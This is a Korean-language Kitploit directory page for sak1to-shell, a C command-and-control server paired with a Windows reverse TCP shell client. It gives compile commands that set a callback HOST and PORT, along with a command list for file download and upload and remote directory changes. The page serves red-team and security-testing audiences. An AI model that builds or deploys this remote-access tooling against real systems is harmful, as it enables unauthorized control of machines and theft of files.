Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
sak1to-shell — 멀티스레드, 멀티 OS/플랫폼 (Linux/Windows) C2 서버와 Windows 리버스 TCP 셸 클라이언트, 모두 C로 작성됨. | Kitploit
도구/GitHubGitHub/d4rk007/sak1to-shell
Payload GenerationPost-ExploitationCommand and ControlRed TeamingRemote Access Tool
GitHubd4rk007/sak1to-shell

sak1to-shell

멀티스레드, 멀티 OS/플랫폼 (Linux/Windows) C2 서버와 Windows 리버스 TCP 셸 클라이언트, 모두 C로 작성됨.

저장소 보기
120294년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

sak1to-shell

멀티 스레드, 멀티 OS/플랫폼 (Linux/Windows) C2 서버 및 Windows 역방향 TCP 셸 클라이언트, 모두 C로 작성되었습니다.

i686-w64-mingw32-gcc로 역방향 TCP 셸 클라이언트 컴파일:

root@kitploit:~
i686-w64-mingw32-gcc sakito_revshell.c lib/windows/sakito_win_core.c -o sakito_revshell.exe -s -ffunction-sections -fdata-sections -fno-exceptions -fmerge-all-constants -static-libgcc -lws2_32 -D PORT=<port_number> -D HOST=\"<server_ipv4_address>\"

Developer 명령 프롬프트 내에서 cl.exe로 역방향 TCP 셸 컴파일:

root@kitploit:~
cl.exe sakito_revshell.c lib/windows/sakito_win_core.c /D PORT=<port_number> /D HOST=\"<server_ipv4_address>\"

GCC로 Linux 서버 컴파일:

root@kitploit:~
gcc -pthread sakito_server.c lib/sakito_server_tools.c lib/linux/sakito_slin_utils.c -o sakito_server -D PORT=<port_number>

Developer 명령 프롬프트 내에서 cl.exe로 Windows 서버 컴파일:

root@kitploit:~
cl.exe sakito_server.c lib/windows/sakito_win_core.c lib/sakito_server_tools.c lib/windows/sakito_swin_utils.c /D PORT=<port_number>

명령 목록:

  • list: 사용 가능한 연결 목록 표시.

  • interact [id]: 클라이언트와 상호 작용.

  • download [filename]: 클라이언트 파일 시스템에서 서버 파일 시스템으로 파일 다운로드.

  • upload [filename]: 서버 파일 시스템에서 클라이언트 파일 시스템으로 파일 업로드.

  • background: 클라이언트 백그라운드 전환.

  • exit: 클라이언트 또는 호스트 종료.

  • cd [dir]: 클라이언트 또는 호스트의 디렉토리 변경.

alt text

도구 다운로드